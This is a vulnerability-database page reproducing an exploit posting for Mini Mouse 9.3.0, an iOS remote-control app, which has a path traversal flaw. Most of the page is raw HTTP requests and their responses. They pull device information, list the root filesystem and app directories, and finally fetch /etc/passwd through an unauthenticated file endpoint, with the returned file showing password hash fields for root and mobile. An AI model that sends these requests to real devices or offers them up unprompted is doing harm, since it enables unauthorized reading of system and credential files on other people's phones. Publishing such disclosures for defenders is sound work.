Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mini Mouse 9.3.0 Local File Inclusion / Path Traversal

🗓️ 06 Apr 2021 00:00:00Reported by goshType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 374 Views

Mini Mouse 9.3.0 - Local File Inclusion / Path Traversal on iOS 14.4.

Code
`# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal  
# Author: gosh  
# Date: 05-04-2021  
# Vendor Homepage: http://yodinfo.com   
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948  
# Version: 9.3.0  
# Tested on: iPhone; iOS 14.4.2  
  
GET /op=get_device_info HTTP/1.1  
Host: 192.168.1.104:8039  
Accept: */*  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Content-Length: 0  
  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/json  
Content-Range: bytes 0-0/-1  
  
{  
"ret_code": 1,  
"ret_msg": "success",  
"data": {  
"uuid": "7E07125B-61BE-4F12-820C-FA706C445219",  
"model": "iPhone",  
"sys_name": "iOS",  
"sys_version": "14.4.2",  
"battery_state": 0,  
"battery_level": -1,  
"memery_total_size": 2983772160,  
"device_name": "mobile",  
"user_name": "iPhone",  
"pwd": "",  
"dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",  
"dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",  
"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",  
"sys_type": 3  
}  
}  
  
  
  
-------------------------------------------------------------------------------------  
  
  
POST /op=get_file_list HTTP/1.1  
Host: 192.168.1.104:8039  
Accept: */*  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Content-Length: 0  
  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/json  
Content-Range: bytes 0-0/-1  
  
{  
"ret_code": 1,  
"ret_msg": "success",  
"data": {  
"list": [{  
"path": "//usr",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "usr",  
"name_display": "usr",  
"file_size": 288,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//bin",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "bin",  
"name_display": "bin",  
"file_size": 128,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//sbin",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "sbin",  
"name_display": "sbin",  
"file_size": 544,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//.file",  
"is_local": true,  
"is_hide": true,  
"is_floder": false,  
"name": ".file",  
"name_display": ".file",  
"file_size": 0,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//etc",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "etc",  
"name_display": "etc",  
"file_size": 11,  
"create_time": 1577865.600000,  
"update_time": 1577865.600000,  
"sys_type": 3  
}, {  
"path": "//System",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "System",  
"name_display": "System",  
"file_size": 128,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//var",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "var",  
"name_display": "var",  
"file_size": 11,  
"create_time": 1577865.600000,  
"update_time": 1577865.600000,  
"sys_type": 3  
}, {  
"path": "//Library",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "Library",  
"name_display": "Library",  
"file_size": 672,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//private",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "private",  
"name_display": "private",  
"file_size": 224,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//dev",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "dev",  
"name_display": "dev",  
"file_size": 1395,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//.ba",  
"is_local": true,  
"is_hide": true,  
"is_floder": true,  
"name": ".ba",  
"name_display": ".ba",  
"file_size": 64,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//.mb",  
"is_local": true,  
"is_hide": true,  
"is_floder": true,  
"name": ".mb",  
"name_display": ".mb",  
"file_size": 64,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//tmp",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "tmp",  
"name_display": "tmp",  
"file_size": 15,  
"create_time": 1577865.600000,  
"update_time": 1577865.600000,  
"sys_type": 3  
}, {  
"path": "//Applications",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "Applications",  
"name_display": "Applications",  
"file_size": 3296,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//Developer",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "Developer",  
"name_display": "Developer",  
"file_size": 64,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}, {  
"path": "//cores",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "cores",  
"name_display": "cores",  
"file_size": 64,  
"create_time": 0,  
"update_time": 0,  
"sys_type": 3  
}]  
}  
}  
  
-------------------------  
using the data found:   
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download  
  
POST /op=get_file_list HTTP/1.1  
Host: 192.168.1.104:8039  
Accept: */*  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Content-Length: 101  
  
{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}  
  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/json  
Content-Range: bytes 0-0/-1  
  
{  
"ret_code": 1,  
"ret_msg": "success",  
"data": {  
"list": [{  
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "GDT",  
"name_display": "GDT",  
"file_size": 96,  
"create_time": 1617228.400302,  
"update_time": 1617228.400302,  
"sys_type": 3  
}, {  
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",  
"is_local": true,  
"is_hide": false,  
"is_floder": false,  
"name": "input_photo.jpg",  
"name_display": "input_photo.jpg",  
"file_size": 6141491,  
"create_time": 1617583.738397,  
"update_time": 1617583.738402,  
"sys_type": 3  
}, {  
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "Ico",  
"name_display": "Ico",  
"file_size": 64,  
"create_time": 1617583.334913,  
"update_time": 1617583.334913,  
"sys_type": 3  
}, {  
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",  
"is_local": true,  
"is_hide": false,  
"is_floder": true,  
"name": "Download",  
"name_display": "Download",  
"file_size": 64,  
"create_time": 1617228.371587,  
"update_time": 1617228.371587,  
"sys_type": 3  
}]  
}  
}  
  
----------------------------------------------------------------------  
  
GET /file=/etc/passwd HTTP/1.1  
Host: 192.168.1.104:8039  
Accept: */*  
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8  
Connection: keep-alive  
Accept-Encoding: gzip, deflate  
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)  
Content-Length: 4  
  
{}  
  
  
HTTP/1.1 200 OK  
Server: bruce_wy/1.0.0  
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS  
Access-Control-Allow-Headers: Content-Type,Origin,Accept  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Credentials: true  
P3P: CP=CAO PSA OUR  
Content-Type: application/octet-stream  
Content-Range: bytes 0-0/2018  
Content-Length : 2018  
  
##  
# User Database  
#   
# This file is the authoritative user database.  
##  
  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh  
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false  
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false  
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false  
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false  
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false  
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false  
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false  
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false  
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false  
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false  
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false  
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false  
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false  
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false  
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false  
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false  
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false  
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false  
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false  
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false  
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false  
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false  
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false  
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false  
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false  
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Apr 2021 00:00Current
0.1Low risk
Vulners AI Score0.1
exploitmini mouseios 14.4.2file inclusionpath traversalsecurity vulnerability
374